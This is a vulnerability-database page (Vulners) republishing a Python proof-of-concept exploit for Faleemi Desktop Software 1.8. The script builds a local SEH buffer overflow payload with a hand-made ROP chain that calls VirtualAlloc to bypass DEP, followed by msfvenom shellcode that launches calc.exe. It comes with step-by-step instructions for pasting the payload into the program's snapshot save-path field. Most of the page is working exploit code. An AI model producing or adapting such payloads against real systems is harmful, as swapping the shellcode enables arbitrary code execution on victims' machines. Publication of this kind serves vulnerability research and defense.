Vulners
Lucene search
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass) Exploit
#!/usr/bin/python
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-26-19
# Vulnerable Software: Faleemi Desktop Software 1.8
# Vendor Homepage: https://www.faleemi.com/
# Version: 1.8.0
# Software Link 1: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. open/copy contents of faleemidep.txt
# 3. open app, click on System Setup
# 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field
# 5. click on save
# 6. pop calc
# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains
# original seh poc from Gionathan "John" Reale, EDB: 45402
# badchars; \x00\x0a\x0d\x2f
import struct
filename = "faleemidep.txt"
junk = "A" * 264
#0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN
seh = "\x7e\xea\x01\x60"
fill = "C"*524
#VirtualAlloc()
#EDI = ROP NOP (RETN)
rop = struct.pack('<L',0x60018221) # POP EDI # RETN
rop += struct.pack('<L',0x60018222) # ROP-NOP
#ECX = flProtect (0x40)
rop += struct.pack('<L',0x60047e71) # POP ECX # RETN
rop += struct.pack('<L',0xffffffff)
for i in range(0,65): rop += struct.pack('<L',0x6004bcc7) # INC ECX # RETN
#ESI = ptr to VirtualAlloc()
rop += struct.pack('<L',0x6004aaca) # POP EAX # RETN
rop += struct.pack('<L',0x6004f0bc) # ptr to &VirtualAlloc()
rop += struct.pack('<L',0x68b88b96) # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += struct.pack('<L',0x73d63c82) # XCHG EAX,ESI # RETN
#EDX = flAllocationType (0x1000)
# Math 1)FFFFFFFF - 0cc48368 = 0F33B7C97 Math 2)0F33B7C97 + 1001 = F33B8C98)
rop += struct.pack('<L',0x68b832d3) # MOV EDX,0CC48368 # RETN
rop += struct.pack('<L',0x60036b1c) # POP EBX # RETN
rop += struct.pack('<L',0xF33B8C98)
rop += struct.pack('<L',0x6004e5ce) # ADD EDX,EBX # POP EBX # RETN 0x10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
#EBP = ReturnTo (ptr to jmp esp)
#!mona jmp -r esp -cpb '\x00\x0a\x0d\x2f'
rop += struct.pack('<L',0x68b901e9) # POP EBP # RETN
rop += struct.pack('<L',0x73dd4206) # jmp esp
#EBX = dwSize (0x1)
rop += struct.pack('<L',0x73dbfebc) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff)
rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN
#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x6004aaca) # POP EAX # RETN
rop += struct.pack('<L',0x90909090) # NOPs
#PUSHAD
rop += struct.pack('<L',0x6004bd85) # PUSHAD # RETN
nops = "\x90"*10
#msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python
calc = ""
calc += "\xd9\xf7\xb8\x0c\xa1\xba\x34\xd9\x74\x24\xf4\x5b\x29"
calc += "\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x18\x43"
calc += "\x4f\xc8\xc8\x01\xb0\x31\x08\x66\x38\xd4\x39\xa6\x5e"
calc += "\x9c\x69\x16\x14\xf0\x85\xdd\x78\xe1\x1e\x93\x54\x06"
calc += "\x97\x1e\x83\x29\x28\x32\xf7\x28\xaa\x49\x24\x8b\x93"
calc += "\x81\x39\xca\xd4\xfc\xb0\x9e\x8d\x8b\x67\x0f\xba\xc6"
calc += "\xbb\xa4\xf0\xc7\xbb\x59\x40\xe9\xea\xcf\xdb\xb0\x2c"
calc += "\xf1\x08\xc9\x64\xe9\x4d\xf4\x3f\x82\xa5\x82\xc1\x42"
calc += "\xf4\x6b\x6d\xab\x39\x9e\x6f\xeb\xfd\x41\x1a\x05\xfe"
calc += "\xfc\x1d\xd2\x7d\xdb\xa8\xc1\x25\xa8\x0b\x2e\xd4\x7d"
calc += "\xcd\xa5\xda\xca\x99\xe2\xfe\xcd\x4e\x99\xfa\x46\x71"
calc += "\x4e\x8b\x1d\x56\x4a\xd0\xc6\xf7\xcb\xbc\xa9\x08\x0b"
calc += "\x1f\x15\xad\x47\x8d\x42\xdc\x05\xdb\x95\x52\x30\xa9"
calc += "\x96\x6c\x3b\x9d\xfe\x5d\xb0\x72\x78\x62\x13\x37\x76"
calc += "\x28\x3e\x11\x1f\xf5\xaa\x20\x42\x06\x01\x66\x7b\x85"
calc += "\xa0\x16\x78\x95\xc0\x13\xc4\x11\x38\x69\x55\xf4\x3e"
calc += "\xde\x56\xdd\x5c\x81\xc4\xbd\x8c\x24\x6d\x27\xd1"
pad = "D" * (7000-len(fill + rop + nops + calc))
buffer = junk + seh + fill + rop + nops + calc + pad
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# 0day.today [2019-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jan 2019 00:00Current
7.2High risk
Vulners AI Score7.2